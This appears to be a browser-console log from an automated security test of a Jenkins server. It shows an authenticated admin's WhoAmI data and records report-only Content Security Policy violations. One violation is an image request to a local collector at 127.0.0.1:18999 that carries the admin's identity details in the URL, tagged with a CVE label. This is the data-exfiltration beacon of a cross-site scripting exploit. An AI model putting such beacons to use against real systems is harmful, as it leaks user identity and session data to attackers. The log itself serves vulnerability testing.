BROWSER_CONSOLE: [DOM] Input elements should have autocomplete attributes (suggested: "current-password"): (More info: https://goo.gl/9p2vKq) %o WHOAMI: {"_class":"hudson.security.WhoAmI","anonymous":false,"authenticated":true,"authorities":["authenticated","FACTOR_PASSWORD"],"name":"admin"} BROWSER_CONSOLE: Executing inline event handler violates the following Content Security Policy directive 'script-src 'report-sample' 'self' usage.jenkins.io'. Either the 'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce ('nonce-...') is required to enable inline execution. Note that hashes do not apply to event handlers, style attributes and javascript: navigations unless the 'unsafe-hashes' keyword is present. The policy is report-only, so the violation has been logged but no further action has been taken. BROWSER_CONSOLE: Loading the image 'http://127.0.0.1:18999/b?m=CVE_2026_84648_vulnerable_1_1483919692&d=%7B%22_class%22%3A%22hudson.security.WhoAmI%22%2C%22anonymous%22%3Afalse%2C%22authenticated%22%3Atrue%2C%22authorities%22%3A%5B%22authenticated%22%2C%22FACTOR_PASSWORD%22%5D%2C%22name%22%3A%22admin%22%7D' violates the following Content Security Policy directive: "img-src 'self' data:". The policy is report-only, so the violation has been logged but no further action has been taken. TARGET_HTTP_STATUS: 200 BROWSER_VISIT_DONE